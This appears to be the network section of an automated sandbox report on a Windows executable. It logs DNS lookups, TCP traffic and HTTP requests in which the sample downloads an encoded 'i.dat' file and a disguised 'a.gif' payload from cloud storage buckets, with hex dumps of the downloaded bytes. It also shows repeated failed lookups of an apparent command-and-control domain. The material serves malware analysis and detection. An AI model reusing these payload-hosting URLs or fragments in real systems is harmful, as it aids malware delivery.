                                                                                                              Jan 11, 2025 04:44:04.881166935 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.883434057 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.883491039 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.885759115 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.885809898 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.890175104 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.890223980 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.892595053 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.892643929 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.897133112 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.897186995 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.899446964 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.899498940 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.901721954 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.901767015 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.906513929 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.906560898 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.909063101 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.909109116 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.913295984 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.913343906 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.915550947 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.915596962 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.920356035 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.920403004 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.923154116 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.923207045 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.925390005 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.925457001 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.934561968 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.934608936 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.936105967 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.936167955 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.936172962 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.936186075 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.936206102 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.936237097 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.936265945 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.936275959 CET44349994118.178.60.103192.168.2.8
                                                                                                              Jan 11, 2025 04:44:04.936295033 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:04.936315060 CET49994443192.168.2.8118.178.60.103
                                                                                                              Jan 11, 2025 04:44:06.010947943 CET499958050192.168.2.838.45.124.13
                                                                                                              Jan 11, 2025 04:44:06.015898943 CET80504999538.45.124.13192.168.2.8
                                                                                                              Jan 11, 2025 04:44:06.016038895 CET499958050192.168.2.838.45.124.13
                                                                                                              Jan 11, 2025 04:44:06.016201973 CET499958050192.168.2.838.45.124.13
                                                                                                              Jan 11, 2025 04:44:06.020948887 CET80504999538.45.124.13192.168.2.8
                                                                                                              Jan 11, 2025 04:44:26.483649969 CET499958050192.168.2.838.45.124.13
                                                                                                              Jan 11, 2025 04:44:26.530152082 CET80504999538.45.124.13192.168.2.8
                                                                                                              Jan 11, 2025 04:44:27.402873993 CET80504999538.45.124.13192.168.2.8
                                                                                                              Jan 11, 2025 04:44:27.402930021 CET499958050192.168.2.838.45.124.13
                                                                                                              Jan 11, 2025 04:44:31.531569958 CET499968050192.168.2.838.45.124.13
                                                                                                              Jan 11, 2025 04:44:31.536603928 CET80504999638.45.124.13192.168.2.8
                                                                                                              Jan 11, 2025 04:44:31.537137985 CET499968050192.168.2.838.45.124.13
                                                                                                              Jan 11, 2025 04:44:31.537262917 CET499968050192.168.2.838.45.124.13
                                                                                                              Jan 11, 2025 04:44:31.542133093 CET80504999638.45.124.13192.168.2.8

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 11, 2025 04:42:15.785600901 CET6526753192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:42:15.926223040 CET53652671.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:42:49.455157995 CET5489653192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:42:49.797044992 CET53548961.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:43:27.555824041 CET5391053192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:43:27.564418077 CET53539101.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:43:33.593600988 CET5179253192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:43:33.604371071 CET53517921.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:43:39.624830961 CET5622853192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:43:39.633903980 CET53562281.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:43:45.656447887 CET5700453192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:43:45.667685986 CET53570041.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:43:48.357151985 CET5731153192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:43:48.677833080 CET53573111.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:43:51.688008070 CET5472953192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:43:51.697365999 CET53547291.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:43:57.765510082 CET5069553192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:43:57.796896935 CET53506951.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:44:03.827811956 CET5062353192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:44:03.837209940 CET53506231.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:44:09.859122992 CET6065353192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:44:09.868380070 CET53606531.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:44:15.890527010 CET6251553192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:44:15.899945021 CET53625151.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:44:21.921494961 CET5162653192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:44:21.931055069 CET53516261.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:44:27.952735901 CET5952453192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:44:27.962085962 CET53595241.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:44:33.984076977 CET5705553192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:44:34.014414072 CET53570551.1.1.1192.168.2.8
                                                                                                              Jan 11, 2025 04:44:40.046340942 CET5771153192.168.2.81.1.1.1
                                                                                                              Jan 11, 2025 04:44:40.053678989 CET53577111.1.1.1192.168.2.8

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 11, 2025 04:42:15.785600901 CET192.168.2.81.1.1.10x1af4Standard query (0)662hfg.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:42:49.455157995 CET192.168.2.81.1.1.10x4517Standard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:27.555824041 CET192.168.2.81.1.1.10xdfa8Standard query (0)gqsqoq.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:33.593600988 CET192.168.2.81.1.1.10x97dbStandard query (0)gqsqoq.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:39.624830961 CET192.168.2.81.1.1.10x89ccStandard query (0)gqsqoq.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:45.656447887 CET192.168.2.81.1.1.10xd6a2Standard query (0)gqsqoq.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:48.357151985 CET192.168.2.81.1.1.10xe977Standard query (0)upitem.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:51.688008070 CET192.168.2.81.1.1.10x4066Standard query (0)gqsqoq.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:57.765510082 CET192.168.2.81.1.1.10x7290Standard query (0)gqsqoq.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:03.827811956 CET192.168.2.81.1.1.10x58cbStandard query (0)gqsqoq.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:09.859122992 CET192.168.2.81.1.1.10x8985Standard query (0)gqsqoq.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:15.890527010 CET192.168.2.81.1.1.10x4abfStandard query (0)gqsqoq.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:21.921494961 CET192.168.2.81.1.1.10x4e75Standard query (0)gqsqoq.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:27.952735901 CET192.168.2.81.1.1.10xa6c7Standard query (0)gqsqoq.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:33.984076977 CET192.168.2.81.1.1.10x33adStandard query (0)gqsqoq.netA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:40.046340942 CET192.168.2.81.1.1.10xee54Standard query (0)gqsqoq.netA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 11, 2025 04:42:15.926223040 CET1.1.1.1192.168.2.80x1af4No error (0)662hfg.oss-cn-beijing.aliyuncs.comsc-2ixf.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:42:15.926223040 CET1.1.1.1192.168.2.80x1af4No error (0)sc-2ixf.cn-beijing.oss-adns.aliyuncs.comsc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:42:15.926223040 CET1.1.1.1192.168.2.80x1af4No error (0)sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.105A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:42:49.797044992 CET1.1.1.1192.168.2.80x4517No error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:42:49.797044992 CET1.1.1.1192.168.2.80x4517No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:42:49.797044992 CET1.1.1.1192.168.2.80x4517No error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:27.564418077 CET1.1.1.1192.168.2.80xdfa8Name error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:33.604371071 CET1.1.1.1192.168.2.80x97dbName error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:39.633903980 CET1.1.1.1192.168.2.80x89ccName error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:45.667685986 CET1.1.1.1192.168.2.80xd6a2Name error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:48.677833080 CET1.1.1.1192.168.2.80xe977No error (0)upitem.oss-cn-hangzhou.aliyuncs.comsc-29h5.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:48.677833080 CET1.1.1.1192.168.2.80xe977No error (0)sc-29h5.cn-hangzhou.oss-adns.aliyuncs.comsc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:48.677833080 CET1.1.1.1192.168.2.80xe977No error (0)sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.103A (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:51.697365999 CET1.1.1.1192.168.2.80x4066Name error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:43:57.796896935 CET1.1.1.1192.168.2.80x7290Name error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:03.837209940 CET1.1.1.1192.168.2.80x58cbName error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:09.868380070 CET1.1.1.1192.168.2.80x8985Name error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:15.899945021 CET1.1.1.1192.168.2.80x4abfName error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:21.931055069 CET1.1.1.1192.168.2.80x4e75Name error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:27.962085962 CET1.1.1.1192.168.2.80xa6c7Name error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:34.014414072 CET1.1.1.1192.168.2.80x33adName error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false
                                                                                                              Jan 11, 2025 04:44:40.053678989 CET1.1.1.1192.168.2.80xee54Name error (3)gqsqoq.netnonenoneA (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                                              • 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                                              • upitem.oss-cn-hangzhou.aliyuncs.com

                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.84970839.103.20.1054431824C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:42:17 UTC111OUTGET /i.dat HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:17 UTC558INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:17 GMT
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Content-Length: 512
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E899EE5BBF3937538155
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "A1CC6E3DD3069453BEF8913F9698C666"
                                                                                                              Last-Modified: Fri, 10 Jan 2025 12:35:03 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 15148768218617465077
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000113
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: ocxuPdMGlFO++JE/lpjGZg==
                                                                                                              x-oss-server-time: 2
                                                                                                              2025-01-11 03:42:17 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 06 06 02 58 3e 3f 76 37 44 44 1a 54 3a 79 36 31 58 5b 58 5f 38 71 3e 33 5a 4a 46 5d 3e 2e 73 3e 51 53 11 5f 71 38 36 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 51 4d 4d 49 3a 73 66 66 50 50 54 0e 68 69 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 05 05 01 5b 3d 3c 75 34 47 47 19 57 39 7a 35 32 5b 58 5b 5c 3b 72 3d 30 59 49 45 5e 3d 2d 70 3d 52 50 12 5e 70 39 37 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 50 4c 4c 48 3b 72 67 67 51 51 55 0f 69 68 21
                                                                                                              Data Ascii: l%00X>?v7DDT:y61X[X_8q>3ZJF]>.s>QS_q86999999999999999999999999999999999QMMI:sffPPThi aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33[=<u4GGW9z52[X[\;r=0YIE^=-p=RP^p97888888888888888888888888888888888PLLH;rggQQUih!


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.84970939.103.20.1054431824C:\Users\user\Desktop\2976587-987347589.07.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:42:18 UTC111OUTGET /a.gif HTTP/1.1
                                                                                                              User-Agent: GetData
                                                                                                              Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:42:19 UTC545INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:42:19 GMT
                                                                                                              Content-Type: image/gif
                                                                                                              Content-Length: 135589
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E89BBB04C53735AFEAA4
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                                                                                              Last-Modified: Fri, 10 Jan 2025 12:30:54 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 8642451798640735006
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000104
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                                                                                              x-oss-server-time: 4
                                                                                                              2025-01-11 03:42:19 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                                              Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                                              2025-01-11 03:42:19 UTC4096INData Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87
                                                                                                              Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                                                                                              2025-01-11 03:42:19 UTC4096INData Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92
                                                                                                              Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                                                                                              2025-01-11 03:42:19 UTC4096INData Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                                                                                                              Data Ascii: c}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                                                                                              2025-01-11 03:42:19 UTC4096INData Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55
                                                                                                              Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
                                                                                                              2025-01-11 03:42:19 UTC4096INData Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92
                                                                                                              Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
